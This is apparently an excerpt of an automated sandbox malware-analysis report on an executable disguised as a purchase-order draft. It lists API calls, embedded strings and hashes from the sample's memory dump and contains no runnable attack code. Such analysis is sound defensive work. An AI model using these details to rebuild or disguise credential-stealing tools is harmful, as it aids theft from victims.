                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf$wcscpy
                                                              • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                              • API String ID: 1283228442-2366825230
                                                              • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                              • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                              • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                              • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                              APIs
                                                              • wcschr.MSVCRT ref: 00413972
                                                              • wcscpy.MSVCRT ref: 00413982
                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                              • wcscpy.MSVCRT ref: 004139D1
                                                              • wcscat.MSVCRT ref: 004139DC
                                                              • memset.MSVCRT ref: 004139B8
                                                                • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                              • memset.MSVCRT ref: 00413A00
                                                              • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                              • wcscat.MSVCRT ref: 00413A27
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                              • String ID: \systemroot
                                                              • API String ID: 4173585201-1821301763
                                                              • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                              • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                              • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                              • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: wcscpy
                                                              • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                              • API String ID: 1284135714-318151290
                                                              • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                              • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                              • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                              • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                              • String ID: 0$6
                                                              • API String ID: 4066108131-3849865405
                                                              • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                              • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                              • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                              • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                              APIs
                                                              • memset.MSVCRT ref: 004082EF
                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                              • memset.MSVCRT ref: 00408362
                                                              • memset.MSVCRT ref: 00408377
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 290601579-0
                                                              • Opcode ID: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                              • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                              • Opcode Fuzzy Hash: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                              • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                              APIs
                                                              • memchr.MSVCRT ref: 00444EBF
                                                              • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                              • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                              • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                              • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                              • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                              • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                              • memset.MSVCRT ref: 0044505E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memchrmemset
                                                              • String ID: PD$PD
                                                              • API String ID: 1581201632-2312785699
                                                              • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                              • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                              • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                              • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                              APIs
                                                              • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                              • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                              • GetDC.USER32(00000000), ref: 00409F6E
                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                              • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                              • GetParent.USER32(?), ref: 00409FA5
                                                              • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                              • String ID:
                                                              • API String ID: 2163313125-0
                                                              • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                              • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                              • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                              • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: free$wcslen
                                                              • String ID:
                                                              • API String ID: 3592753638-3916222277
                                                              • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                              • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                              • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                              • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                              APIs
                                                              • memset.MSVCRT ref: 0040A47B
                                                              • _snwprintf.MSVCRT ref: 0040A4AE
                                                              • wcslen.MSVCRT ref: 0040A4BA
                                                              • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                              • wcslen.MSVCRT ref: 0040A4E0
                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpywcslen$_snwprintfmemset
                                                              • String ID: %s (%s)$YV@
                                                              • API String ID: 3979103747-598926743
                                                              • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                              • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                              • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                              • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                              APIs
                                                              • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                              • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                              • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                              • API String ID: 2780580303-317687271
                                                              • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                              • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                              • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                              • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                              • wcslen.MSVCRT ref: 0040A6B1
                                                              • wcscpy.MSVCRT ref: 0040A6C1
                                                              • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                              • wcscpy.MSVCRT ref: 0040A6DB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                              • String ID: Unknown Error$netmsg.dll
                                                              • API String ID: 2767993716-572158859
                                                              • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                              • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                              • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                              • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                              APIs
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                              • wcscpy.MSVCRT ref: 0040DAFB
                                                              • wcscpy.MSVCRT ref: 0040DB0B
                                                              • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfilewcscpy$AttributesFileString
                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                              • API String ID: 3176057301-2039793938
                                                              • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                              • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                              • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                              • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                              APIs
                                                              Strings
                                                              • database %s is already in use, xrefs: 0042F6C5
                                                              • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                              • database is already attached, xrefs: 0042F721
                                                              • cannot ATTACH database within transaction, xrefs: 0042F663
                                                              • too many attached databases - max %d, xrefs: 0042F64D
                                                              • out of memory, xrefs: 0042F865
                                                              • unable to open database: %s, xrefs: 0042F84E
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                              • API String ID: 1297977491-2001300268
                                                              • Opcode ID: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                                              • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                              • Opcode Fuzzy Hash: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                                              • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                              APIs
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                              • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                              • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                              • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                              • String ID: ($d
                                                              • API String ID: 1140211610-1915259565
                                                              • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                              • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                              • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                              • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                              APIs
                                                              • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                              • Sleep.KERNEL32(00000001), ref: 004178E9
                                                              • GetLastError.KERNEL32 ref: 004178FB
                                                              • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: File$ErrorLastLockSleepUnlock
                                                              • String ID:
                                                              • API String ID: 3015003838-0
                                                              • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                              • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                              • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                              • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                              APIs
                                                              • memset.MSVCRT ref: 00407E44
                                                              • memset.MSVCRT ref: 00407E5B
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                              • wcscpy.MSVCRT ref: 00407F10
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                              • String ID:
                                                              • API String ID: 59245283-0
                                                              • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                              • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                              • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                              • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                              APIs
